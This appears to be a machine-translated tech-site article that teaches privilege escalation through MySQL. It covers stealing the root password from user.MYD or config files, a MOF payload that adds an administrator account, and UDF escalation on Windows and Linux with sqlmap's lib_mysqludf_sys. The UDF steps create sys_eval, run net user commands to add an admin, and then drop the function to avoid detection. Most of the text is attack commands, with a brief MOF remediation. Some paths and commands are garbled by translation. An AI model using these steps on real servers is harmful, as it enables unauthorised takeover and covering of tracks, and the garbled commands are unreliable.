Shulou(Shulou.com)06/01 Report--

This article shows you how to raise rights in MySQL. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

The necessary conditions for MySQL to raise the right:

Has root permissions for MySQL, and MySQL runs with system permissions.

Have permission to execute SQL statements.

How to get the root password:

View database configuration file

Keywords: config, conn, sql, data, inc, database, etc.

Download the data file under the mysql installation path

The data directory under the installation path stores the data information of the database.

The root account password is stored in the user table under the mysql database.

Full path = installation path +\ data\ mysql\ user.MYD

Brute force cracking

Several ways of raising Rights in MySQL Database

Udf raises the right

Mof raises the right

Boot script (startup item rights)

MOF raises the right

Principle

Make use of the nullevt.mof file in the C:\ Windows\ System32\ wbem\ MOF directory

Taking advantage of the fact that the file is executed every minute, writing cmd commands to the file will be executed.

Utilization condition

It can only be used in windows systems, but only in low-version systems, such as xp and server2003.

Read and write access to the C:\ Windows\ System32\ wbem\ MOF directory

You can find a writable directory and write to the mof file

Method of raising rights

Upload mof files in a writable directory.

Upload the mof file to C:/wmpub/nullevt.mof

Copy this file to the C:/Windows/System32/wbem/MOF/nullevt.mof directory

Select load_file ('Clux Universe wmpubmax nullevt. MOF') into dumpfile 'Cpurl Unix Windows Universe System32 and wbemUnix MOFmax nullevt.MOF'

Copy the following code to the file with the mof suffix

# pragma namespace ("\.\ root\ subscription") instance of EventFilter as $EventFilter {EventNamespace = "Root\ Cimv2"; Name = "filtP2"; Query = "Select * From InstanceModificationEvent"Where TargetInstance Isa\" Win32_LocalTime\ "" And TargetInstance.Second = 5 "; QueryLanguage =" WQL ";}; instance of ActiveScriptEventConsumer as $Consumer {Name =" consPCSV2 "; ScriptingEngine =" JScript "; ScriptText =" var WSH = newActiveXObject (\ "WScript.Shell\")\ nWSH.run (\ "net.exe user admin admin / add") "; Instance of _ _ FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;}

By uploading the mof file to the target machine, you can modify the code and execute the command.

At present, the method of lifting weight in mof is less, so it is recommended to use udf script to lift weight in MySQL database.

Remedial measures

When it is found that the server is being raised using mof, resolve the way to continue to execute system commands:

Stop the winmgmt service first: net stop winmgmt

Delete the folder: C:\ Windows\ System32\ wbem\ Repository

Restart the winmgmt service: net start winmgmt

UDF weighting (user-defined function weighting)

Principle

UDF (User Defined Funtion) user-defined function, which extends the function of mysql server by adding new functions.

Information collection

Select version (); # get the database version select user (); # get the database user select @ @ basedir; # get the database installation directory show variables like'% plugin%'; # View the plugin path Windows UDF raises the right

UDF can be understood as the function library of MySQL, and you can make use of the creation function defined by udf. To take advantage of udf, you must upload udf.dll as the execution library for udf. The UDF extension is supported in MySQL, which allows us to call functions in DLL to achieve some special functions.

Utilization condition

If the mysql version is greater than 5.1, the mysql udf.dll file must be placed in the MySQL\ Lib\ Plugin\ folder of the mysql installation directory, which does not exist by default. You need to use webshell to find the mysql installation directory, and create the DLL\ Lib\ Plugin\ folder under the installation directory, and then import udf.dll into this directory.

If the mysql version is less than 5.1, the windows server udf.dll file is placed in the c:/windows/system32/ directory under windows server 2003 and in the c:/winnt/system32/ directory under windows server 2000.

Master the root account of the mysql database, and thus have insert and delete permissions on mysql to create and discard functions.

Have permission to write udf.dll to the appropriate directory.

Basic steps

The method of obtaining DLL File

In the sqlmap/data/udf/mysql directory, there are 32-bit and 64-bit dll files (MySQL digits) in the Windows directory.

The dll files in the folder are XOR encoded and can be decoded using sqlmap/extract/cloak.py

Python / sqlmap/extra/cloak/cloak.py-d-I / sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_

Upload the decoded DLL file (DLL file containing user-defined functions) to a writable directory, and then import it into MySQL\ lib\ plugin\

Select LOAD_FILE ('select LOAD_FILE / writable directory / lib_mysqludf_sys.dll') into dumpfile' CentralAccording phStudy2016MySQLAccording to MySQL _

Introduce functions from DLL into MySQL database

Create a custom function

Create function sys_eval returns string soname 'lib_mysqludf_sys.dll'

Create a function named sys_eval with a return value of type string and call a file of type lib_mysqludf_sys.dll

Note: if you need to create functions that exist in the .dll file, you can open the .dll file using a hexadecimal editor to see the functions that can be created.

Use this function to execute system commands to lift weights

View current user permissions

Select sys_eval ("whoami")

Create an account and upgrade it to administrator privileges

Select sys_eval ("net user winhex passw@ord / add")

Select sys_eval ("net localgroup administrators winhex / add")

Delete the previously introduced function

Prevent it from being discovered by administrators and prevent other attackers from using

Drop function sys_eval

Delete from mysql.func where name='sys_eval'

Linux UDF raises the right

Brief introduction

Execute arbitrary commands by customizing library functions

The file containing the user-defined function is a .so file

Request

Under [mysqld] in my.ini, add secure_file_priv= "" without restricting the import and export path.

Has the password of the database root account, and the mysql database runs with root privileges

Have permission to execute sql statements

Export directory writable

Selinux in the system is turned off

The process of empowerment

Find the path to the plug-in library

Show variables like'% plugin%'

The results are as follows:

Variable_nameValueplugin_dir/usr/lib64/mysql/plugin

Find the UDF library file corresponding to the operating system database

The lib_mysqludf_sys.so_ file under sqlmap-master\ data\ udf\ mysql\ linux\ 64

Hexadecimal encoding of so files (UDF library files)

Decode the contents of the so file and write it to the mysql plug-in library directory

Select unhex ('hexadecimal encoding of so files') into dumpfile'/ usr/lib64/mysql/plugin/xxx.so'

View the functions supported by the udf library

Note: if you need to create functions that exist in the .so file, you can open the .so file using a hexadecimal editor to see the functions that can be created.

Create function

Once written, the command to create the function is executed, and a function of sys_eval is created to execute system commands, all of which are system permissions.

Create function sys_eval returns string soname 'xxx.so'

Carry out the system order, raise the right

Sys_eval this function can execute system commands, you can enter system commands in parentheses.

View current user permissions

Select sys_eval ("whoami")

Create an account and upgrade it to administrator privileges

There is no need to judge the version of mysql, just check the path and write the so file directly. The file in Linux is so file.

After getshell, enter whoami on the terminal and find that it is only the apache user right.

Look for the database configuration file of the website, check the account password of the database, and you can see the account root password root.

Log in to the mysql database and enter show variables like'% plugin%'; to view the plugin path.

The results are as follows:

Variable_nameValueplugin_dir/usr/lib64/mysql/plugin

We encode the so file in hexadecimal, decode it and write it to the directory, which is returned as true.

Select unhex ('hexadecimal encoding of so files') into dumpfile'/ usr/lib64/mysql/plugin/xxx.so'

Once written, the command to create the function is executed, and a function of sys_eval is created to execute system commands, all of which are system permissions.

Create function sys_eval returns string soname 'xxx.so'

Sys_eval this function can execute system commands, you can enter system commands in parentheses.

Select sys_eval ('whoami')

The above content is how to raise rights in MySQL. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.